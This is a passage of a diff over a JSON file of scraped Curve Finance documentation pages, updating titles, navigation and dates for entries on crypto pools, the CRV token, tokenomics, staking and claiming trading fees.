Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Whitepaper Liquidity Providers Fees Risks Home Getting Started Understanding CryptoPools (v2) Crypto pools are Curve pools holding assets with different prices. Curve core originally was pegged assets but a new type of AMM allows for extremely efficient trading and low risks of non-pegged assets. Crypto pools use liquidity more effectively by concentrating it at current prices. As trades happen, the pool readjusts its internal price to the highest liquidity region without creating losses for the pool. Crypto pools also have variable fees which can range between 0.04% and 0.40%. Tricrypto , the first and main base pool has the following coins: USDT/WBTC/WETH for Ethereum. On Polygon, the first pool has AAVE tokens and can handle swaps with the following tokens: DAI/USDC/USDT/ETH/WBTC. Whitepaper Read the v2 whitepaper by clicking here . Liquidity Providers Becoming a liquidity provider in a Curve Crypto pool is in all ways similar to stable pools. You will gain exposure and risks to all assets in the pools. You can deposit one or all the coins in the pool. Always be sure to check the bonus/slippage warning box. Fees Fees on those pool range from 0.04% to 0.4%. The current fee varies based on how close the price is from the internal oracle. You can check a pool's current fee which changes every trade on the bottom of a pool page. Risks As with any liquidity providing in blockchain, there are some smart contract risks involved. Curve crypto pools have been audited by MixBytes and ChainSecurity but audits never eliminate risks completely. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Understanding curve", + "title": "Understanding Curve (v1)", "html_url": "https://resources.curve.fi/base-features/understanding-curve/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding curve Table of contents Understanding Curve v1 What is Curve.fi? What are liquidity pools? What are those percentages next to each pool? What is the CRV token? Can I use Curve on sidechains? How Can I Launch a Pool Why has Curve grown so quickly? Where can I find Curve smart contracts? Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Curve v1 What is Curve.fi? What are liquidity pools? What are those percentages next to each pool? What is the CRV token? Can I use Curve on sidechains? How Can I Launch a Pool Why has Curve grown so quickly? Where can I find Curve smart contracts? Understanding curve Understanding Curve v1 A short guide to understand the basics of becoming a liquidity provider on Curve. Getting started with Curve isnt easy, there is a lot to grasp and the unique UI can be a lot to take in. This small guide is intended for Curve beginners with an understanding of DeFi and Crypto. It tries to answer recurring questions about how to get started with Curve and how it works or makes money for liquidity providers. What is Curve.fi? The easiest way to understand Curve is to see it as an exchange. Its main goal is to let users and other decentralised protocols exchange ERC-20 tokens (DAI to USDC for example) through it with low fees and low slippage . Unlike exchanges that match a buyer and a seller, Curve uses liquidity pools. To achieve successful exchange volume, Curve needs a high volume of liquidity (tokens) and therefore offers rewards to liquidity providers . Curve is non-custodial , meaning the Curve developers do not have access to your tokens. Curve pools are also non-upgradable, so you can have confidence that the logic protecting your funds can never change. What are liquidity pools? Liquidity pools are pools of tokens that sit in smart contracts and can be exchanged or withdrawn at rates set by the parameters of the smart contract. Adding liquidity to a liquidity pool gives you the opportunity to earn trading fees and possibly rewards. For more information, visit the following section: Understanding Curve Pools What are those percentages next to each pool? Curve pools may have several different percentages shown next to them in the UI. The first column, vAPY, refers to the annualized rate of trading fees earned by liquidity providers in the pool. Any activity on every Curve pool generates fees, a portion of which accrue to everybody who has a stake in the pool. Further information is in the Liquidity Provider section . The second column refers to the reward gauges. This entitles liquidity providers to earn bonus CRV emissions. More detail on these bonuses are in the Reward Gauges section . What is the CRV token? CRV token is a governance and utility token for Curve. Understanding $CRV Understanding Governance Can I use Curve on sidechains? Yes. Curve has launched on several sidechains and will continue to do so. Visit our section on Multichain for more information. How Can I Launch a Pool All new Curve pools are deployed permissionlessly through the Curve Factory. This means anybody can deploy a pool anytime, anywhere. For a full guide, check our Factory Pools section. Why has Curve grown so quickly? When Curve launched it grew quickly by securing the underdeveloped stablecoin market. Stablecoins have become an inherent part of cryptocurrency for a long time but they now come in many different flavours (DAI, TUSD, sUSD, bUSD, USDC and so on) which means there is a much bigger need for crypto users to move from a stable coin to another. Centralised exchanges tend to have high fees which are problematic for those trying to move from a stable coin to another. As a result, Curve.fi has become the best place to exchange stable coins because of its low fees and low slippage. The proprietary Curve StableSwap exchange was outlined in the founding whitepaper, and provides a superior formula for exchanging stablecoins than competing AMMs. Read through the whitepaper to learn more. More recently, Curve launched v2 Crypto Pools to bring the same simplicity and efficiency of Curve's stablecoin pools to transactions between differentially priced assets (ie BTC and ETH). These pools are sufficiently different to justify their own section: Where can I find Curve smart contracts? Here: https://www.curve.fi/contracts The Github repository also open sources the bulk of Curve development activity. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding Curve (v1) Table of contents What is Curve.fi? What are liquidity pools? What are those percentages next to each pool? What is the CRV token? Can I use Curve on sidechains? How Can I Launch a Pool Why has Curve grown so quickly? Where can I find Curve smart contracts? Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents What is Curve.fi? What are liquidity pools? What are those percentages next to each pool? What is the CRV token? Can I use Curve on sidechains? How Can I Launch a Pool Why has Curve grown so quickly? Where can I find Curve smart contracts? Home Getting Started Understanding Curve (v1) A short guide to understand the basics of becoming a liquidity provider on Curve. Getting started with Curve isnt easy, there is a lot to grasp and the unique UI can be a lot to take in. This small guide is intended for Curve beginners with an understanding of DeFi and Crypto. It tries to answer recurring questions about how to get started with Curve and how it works or makes money for liquidity providers. What is Curve.fi? The easiest way to understand Curve is to see it as an exchange. Its main goal is to let users and other decentralised protocols exchange ERC-20 tokens (DAI to USDC for example) through it with low fees and low slippage . Unlike exchanges that match a buyer and a seller, Curve uses liquidity pools. To achieve successful exchange volume, Curve needs a high volume of liquidity (tokens) and therefore offers rewards to liquidity providers . Curve is non-custodial , meaning the Curve developers do not have access to your tokens. Curve pools are also non-upgradable, so you can have confidence that the logic protecting your funds can never change. What are liquidity pools? Liquidity pools are pools of tokens that sit in smart contracts and can be exchanged or withdrawn at rates set by the parameters of the smart contract. Adding liquidity to a liquidity pool gives you the opportunity to earn trading fees and possibly rewards. For more information, visit the following section: Understanding Curve Pools What are those percentages next to each pool? Curve pools may have several different percentages shown next to them in the UI. The first column, vAPY, refers to the annualized rate of trading fees earned by liquidity providers in the pool. Any activity on every Curve pool generates fees, a portion of which accrue to everybody who has a stake in the pool. Further information is in the Liquidity Provider section . The second column refers to the reward gauges. This entitles liquidity providers to earn bonus CRV emissions. More detail on these bonuses are in the Reward Gauges section . What is the CRV token? CRV token is a governance and utility token for Curve. Understanding $CRV Understanding Governance Can I use Curve on sidechains? Yes. Curve has launched on several sidechains and will continue to do so. Visit our section on Multichain for more information. How Can I Launch a Pool All new Curve pools are deployed permissionlessly through the Curve Factory. This means anybody can deploy a pool anytime, anywhere. For a full guide, check our Factory Pools section. Why has Curve grown so quickly? When Curve launched it grew quickly by securing the underdeveloped stablecoin market. Stablecoins have become an inherent part of cryptocurrency for a long time but they now come in many different flavours (DAI, TUSD, sUSD, bUSD, USDC and so on) which means there is a much bigger need for crypto users to move from a stable coin to another. Centralised exchanges tend to have high fees which are problematic for those trying to move from a stable coin to another. As a result, Curve.fi has become the best place to exchange stable coins because of its low fees and low slippage. The proprietary Curve StableSwap exchange was outlined in the founding whitepaper, and provides a superior formula for exchanging stablecoins than competing AMMs. Read through the whitepaper to learn more. More recently, Curve launched v2 Crypto Pools to bring the same simplicity and efficiency of Curve's stablecoin pools to transactions between differentially priced assets (ie BTC and ETH). These pools are sufficiently different to justify their own section: Where can I find Curve smart contracts? Here: https://www.curve.fi/contracts The Github repository also open sources the bulk of Curve development activity. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1850,63 +1850,63 @@ { "title": "Claiming trading fees", "html_url": "https://resources.curve.fi/crv-token/claiming-trading-fees/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Claiming trading fees Table of contents Claiming Trading Fees Swapping 3CRV for a stable coin How does it all work? Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Claiming Trading Fees Swapping 3CRV for a stable coin How does it all work? Claiming trading fees Claiming Trading Fees Users who stake $CRV can claim trading fees as often as you'd like, but fees will only be converted into 3CRV once a week. To claim your fees, visit https://curve.fi/#/ethereum/dashboard and click the blue \"Claim LP Rewards\" button. If you are using the classic UI please visit: https://classic.curve.fi/ and look for the green \"Claim\" button in the box labeled \"veCRV 3pool LP claim\" at the bottom of the page. Every time a trade takes place on Curve Finance, 50% of the trading fee is collected by the users who have vote locked their CRV. Every week, fees are collected from the pools, converted to 3CRV and distributed. There is a delay before you can first claim your 3CRV after locking. It takes 8 days from the Thursday after which you lock before you can claim. Understanding $CRV Swapping 3CRV for a stable coin If you would like to swap your 3CRV back into a stable coin, you can head to https://curve.fi/#/ethereum/pools/3pool/withdraw , select the stable you would like to receive (optional) and click \" Withdraw \". After confirming your transaction, you will then receive 3CRV. How does it all work? When the burn is triggered, a contract collects all trading fees from all the swap pool contracts. Those fees come in dozen of different stable coins, tokenized Bitcoin and Ethereum flavours. The fee tokens are traded into USDC using Curve and Synthetix, which is then deposited to 3Pool. Finally, the burner creates a checkpoint which updates all the claimable balance of each veCRV holder. Burning is an expensive process, as it involves many complex transactions, but anyone can trigger the process whenever they wish if they are willing to pay for it. Fees may only be claimed for the week that has already passed, because the burner does not know how much everyone is entitled to before the end of the period. Fees will be available on a weekly basis within 24 hours after Thursday midnight UTC, as long as someone (usually the Curve team) has initiated the burn prior to that. Technical users can review the burner contracts here: https://github.com/curvefi/curve-dao-contracts/tree/master/contracts/burners The following script may be used to initiate the burn process: https://github.com/curvefi/curve-dao-contracts/blob/master/scripts/burners/claim_and_burn_fees.py Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees Claiming trading fees Table of contents Swapping 3CRV for a stable coin How does it all work? $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Swapping 3CRV for a stable coin How does it all work? Home $CRV Token Claiming trading fees Users who stake $CRV can claim trading fees as often as you'd like, but fees will only be converted into 3CRV once a week. To claim your fees, visit https://curve.fi/#/ethereum/dashboard and click the blue \"Claim LP Rewards\" button. If you are using the classic UI please visit: https://classic.curve.fi/ and look for the green \"Claim\" button in the box labeled \"veCRV 3pool LP claim\" at the bottom of the page. Every time a trade takes place on Curve Finance, 50% of the trading fee is collected by the users who have vote locked their CRV. Every week, fees are collected from the pools, converted to 3CRV and distributed. There is a delay before you can first claim your 3CRV after locking. It takes 8 days from the Thursday after which you lock before you can claim. Understanding $CRV Swapping 3CRV for a stable coin If you would like to withdraw your 3CRV back into a stable coin, you can head to https://curve.fi/#/ethereum/pools/3pool/withdraw , select the stable you would like to receive (optional) and click \" Withdraw \". After confirming your transaction, you will then receive 3CRV. How does it all work? When the burn is triggered, a contract collects all trading fees from all the swap pool contracts. Those fees come in dozen of different stable coins, tokenized Bitcoin and Ethereum flavours. The fee tokens are traded into USDC using Curve and Synthetix, which is then deposited to 3Pool. Finally, the burner creates a checkpoint which updates all the claimable balance of each veCRV holder. Burning is an expensive process, as it involves many complex transactions, but anyone can trigger the process whenever they wish if they are willing to pay for it. Fees may only be claimed for the week that has already passed, because the burner does not know how much everyone is entitled to before the end of the period. Fees will be available on a weekly basis within 24 hours after Thursday midnight UTC, as long as someone (usually the Curve team) has initiated the burn prior to that. Technical users can review the burner contracts here: https://github.com/curvefi/curve-dao-contracts/tree/master/contracts/burners The following script may be used to initiate the burn process: https://github.com/curvefi/curve-dao-contracts/blob/master/scripts/burners/claim_and_burn_fees.py 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Crv basics", + "title": "CRV Basics", "html_url": "https://resources.curve.fi/crv-token/crv-basics/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv basics Table of contents $CRV Basics What is the purpose of $CRV? How to get $CRV? Where can I find the release schedule? What is the current circulating supply? What is the utility of $CRV? What is $CRV vote locking? Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents $CRV Basics What is the purpose of $CRV? How to get $CRV? Where can I find the release schedule? What is the current circulating supply? What is the utility of $CRV? What is $CRV vote locking? Crv basics $CRV Basics Basics about the CRV token. What is the purpose of $CRV? The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. How to get $CRV? Liquidity providers on the Curve platform receive $CRV for providing liquidity. This ensures the protocol continues offering low fees and extremely low slippage. Where can I find the release schedule? You can find the release schedule for the next six years at this address: https://dao.curve.fi/inflation What is the current circulating supply? The current circulating supply can be found at this address: https://dao.curve.fi/inflation What is the utility of $CRV? $CRV is a governance token with time-weighted voting and value accrual mechanisms. You can find out what to do with $CRV by clicking below: Understanding $CRV What is $CRV vote locking? One of the most important incentive to holding CRV is the vote locking boost. Each liquidity provider can increase their daily CRV rewards by vote locking CRV. You can vote lock your CRV at this address: https://dao.curve.fi/locker Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Basics Table of contents What is the purpose of $CRV? How to get $CRV? Where can I find the release schedule? What is the current circulating supply? What is the utility of $CRV? What is $CRV vote locking? CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents What is the purpose of $CRV? How to get $CRV? Where can I find the release schedule? What is the current circulating supply? What is the utility of $CRV? What is $CRV vote locking? Home $CRV Token CRV Basics What is the purpose of $CRV? The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. How to get $CRV? Liquidity providers on the Curve platform receive $CRV for providing liquidity. This ensures the protocol continues offering low fees and extremely low slippage. Where can I find the release schedule? You can find the release schedule for the next six years at this address: https://dao.curve.fi/inflation What is the current circulating supply? The current circulating supply can be found at this address: https://dao.curve.fi/inflation What is the utility of $CRV? $CRV is a governance token with time-weighted voting and value accrual mechanisms. You can find out what to do with $CRV by clicking below: Understanding $CRV What is $CRV vote locking? One of the most important incentive to holding CRV is the vote locking boost. Each liquidity provider can increase their daily CRV rewards by vote locking CRV. You can vote lock your CRV at this address: https://dao.curve.fi/locker 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Crv tokenomics", + "title": "CRV Tokenomics", "html_url": "https://resources.curve.fi/crv-token/crv-tokenomics/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Crv tokenomics Table of contents $CRV Tokenomics Supply Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents $CRV Tokenomics Supply Crv tokenomics $CRV Tokenomics $CRV officially launched on the 13 th of August 2020. The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. Supply The total supply of 3.03b is distributed as such: 62% to community liquidity providers 30% to shareholders (team and investors) with 2-4 years vesting 3% to employees with 2 years vesting 5% to the community reserve The initial supply of around 1.3b (~43%) is distributed as such: 5% to pre-CRV liquidity providers with 1 year vesting 30% to shareholders (team and investors) with 2-4 years vesting 3% to employees with 2 years vesting 5% to the community reserve The circulating supply will be 0 at launch and the initial release rate will be around 2m CRV per day. Full release schedule here: https://dao.curve.fi/releaseschedule Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics CRV Tokenomics Table of contents Supply Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Supply Home $CRV Token CRV Tokenomics $CRV officially launched on the 13 th of August 2020. The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. Supply The total supply of 3.03b is distributed as such: 62% to community liquidity providers 30% to shareholders (team and investors) with 2-4 years vesting 3% to employees with 2 years vesting 5% to the community reserve The initial supply of around 1.3b (~43%) is distributed as such: 5% to pre-CRV liquidity providers with 1 year vesting 30% to shareholders (team and investors) with 2-4 years vesting 3% to employees with 2 years vesting 5% to the community reserve The circulating supply will be 0 at launch and the initial release rate will be around 2m CRV per day. Full release schedule here: https://dao.curve.fi/releaseschedule 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Staking your crv", + "title": "Staking your CRV", "html_url": "https://resources.curve.fi/crv-token/staking-your-crv/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Staking your crv Table of contents Staking your $CRV Locking your $CRV Claiming your trading fees How to calculate the APY for staking CRV? Further Reading Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Staking your $CRV Locking your $CRV Claiming your trading fees How to calculate the APY for staking CRV? Further Reading Staking your crv Staking your $CRV Starting on the 19 th of September 2020, 50% of all trading fees are distributed to veCRV holders . This is the result of a community-led proposal to align incentives between liquidity providers and governance participants (veCRV holders). Collected fees will be used to buy 3CRV (LP token for 3Pool) and distribute them to veCRV holders. This currently represents over $15M in trading fees per year. veCRV stands for vote escrowed $CRV, they are $CRV vote locked in the Curve DAO. Vote Locking You can also lock $CRV to obtain a boost on your provided liquidity. Boosting your CRV Rewards Video about how to stake $CRV: https://www.youtube.com/watch?v=8GAI1lopEdU Locking your $CRV Once you know how much and how long you wish to lock for, visit the following page: https://dao.curve.fi/locker Enter the amount you want to lock and select your expiry. Remember locking is not reversible. The amount of veCRV received will depend on how much and how long you vote for. You can extend a lock and add $CRV to it at any point but you cannot have $CRV with different expiry dates. Claiming your trading fees Claiming Trading Fees How to calculate the APY for staking CRV? The formula below can help you calculate the daily APY: $$ \\frac{DailyTradingVolume * 0.0002 * 365}{TotalveCRV * CRVPrice} * 100 $$ Further Reading https://www.stakingrewards.com/earn/curve-dao-token/ Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Staking your CRV Table of contents Locking your $CRV Claiming your trading fees How to calculate the APY for staking CRV? Further Reading Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Locking your $CRV Claiming your trading fees How to calculate the APY for staking CRV? Further Reading Home $CRV Token Staking your CRV Starting on the 19 th of September 2020, 50% of all trading fees are distributed to veCRV holders . This is the result of a community-led proposal to align incentives between liquidity providers and governance participants (veCRV holders). Collected fees will be used to buy 3CRV (LP token for 3Pool) and distribute them to veCRV holders. This currently represents over $15M in trading fees per year. veCRV stands for vote escrowed $CRV, they are $CRV vote locked in the Curve DAO. Vote Locking You can also lock $CRV to obtain a boost on your provided liquidity. Boosting your CRV Rewards Video about how to stake $CRV: https://www.youtube.com/watch?v=8GAI1lopEdU Locking your $CRV Once you know how much and how long you wish to lock for, visit the following page: https://dao.curve.fi/locker Enter the amount you want to lock and select your expiry. Remember locking is not reversible. The amount of veCRV received will depend on how much and how long you vote for. You can extend a lock and add $CRV to it at any point but you cannot have $CRV with different expiry dates. Claiming your trading fees Claiming Trading Fees How to calculate the APY for staking CRV? The formula below can help you calculate the daily APY: $$ \\frac{DailyTradingVolume * 0.0002 * 365}{TotalveCRV * CRVPrice} * 100 $$ Further Reading https://www.stakingrewards.com/earn/curve-dao-token/ 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Understanding crv", + "title": "Understanding CRV", "html_url": "https://resources.curve.fi/crv-token/understanding-crv/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Understanding crv Table of contents Understanding $CRV Staking (trading fees) 